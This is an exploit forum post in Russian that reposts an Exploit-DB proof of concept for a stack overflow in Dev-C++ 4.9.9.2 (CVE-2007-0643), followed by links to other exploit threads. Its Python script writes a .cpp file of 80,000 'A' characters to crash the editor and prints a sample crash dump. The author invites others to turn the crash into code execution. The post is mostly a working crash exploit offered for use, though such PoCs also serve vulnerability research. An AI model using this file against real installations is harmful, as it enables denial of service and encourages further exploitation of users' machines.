Exploit Dev-C++ 4.9.9.2 - '.CPP' File Parsing Local Stack Overflow (PoC)

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3229
Проверка EDB
  1. Пройдено
Автор
SHINNAI
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2007-0643
Дата публикации
2007-01-30
Код: 
#!/usr/bin/env python
print "--------------------------------------------------------------"
print "Dev-C++ 4.9.9.2 Stack Overflow"
print "url: http://www.bloodshed.net/"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print "--------------------------------------------------------------"

try:
   char = "\x41" * 80000

   out_file = open('DevCpp.cpp','wb')
   out_file.write(char)
   out_file.close()

   print "File succesfully created!\n\n"
   print "Here is a dump:"
   print "----------------------------------------------------------------"
   print "pid=0A58 tid=04C4  EXCEPTION (first-chance)"
   print "----------------------------------------------------------------"
   print "Exception C00000FD (STACK_OVERFLOW)"
   print "----------------------------------------------------------------"
   print "EAX=00000674: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??"
   print "EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??"
   print "ECX=00404358: 8B 44 24 04 F7 40 04 06-00 00 00 0F 85 89 00 00"
   print "EDX=7C9137D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00"
   print "ESP=00032E1C: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00"
   print "EBP=000334A0: CC 34 03 00 7C 43 40 00-B0 34 03 00 BF 37 91 7C"
   print "ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??"
   print "EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??"
   print "EIP=7C8024E0: 53 56 57 8B 45 F8 89 65-E8 50 8B 45 FC C7 45 FC"
   print "              --> PUSH EBX"
   print
"----------------------------------------------------------------\n"
   print "Encreasing the number of characters will change the results of"
   print "this exploit. For example try with 1000000 of characters and see"
   print "what happen."
   print "I was unable to execute arbitrary code but I think someone
better"
   print "than me can succesfully exploit it :P\n"
except:
   print "Unable to create file!"

# milw0rm.com [2007-01-30]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow
Ответы
0
Просмотры
295
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Kaspersky AntiVirus - '.DEX' File Format Parsing Memory Corruption
Ответы
0
Просмотры
455
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.TTF' File Embedded in SWF
Ответы
0
Просмотры
443
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Oracle Outside-In JP2 - File Parsing Heap Overflow
Ответы
0
Просмотры
418
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Oracle Outside-In - '.FPX' File Parsing Heap Overflow
Ответы
0
Просмотры
451
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Oracle Outside-In - '.LWP' File Parsing Stack Buffer Overflow
Ответы
0
Просмотры
423
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit KingView - Log File Parsing Buffer Overflow (Metasploit)
Ответы
0
Просмотры
428
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit IceWarp Mail Server 10.3.2 server/webmail.php Soap Message Parsing - Arbitrary File Disclosure
Ответы
0
Просмотры
413
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Overflow
Ответы
0
Просмотры
358
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Novell File Reporter (NFR) Agent - XML Parsing Remote Code Execution
Ответы
0
Просмотры
386
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу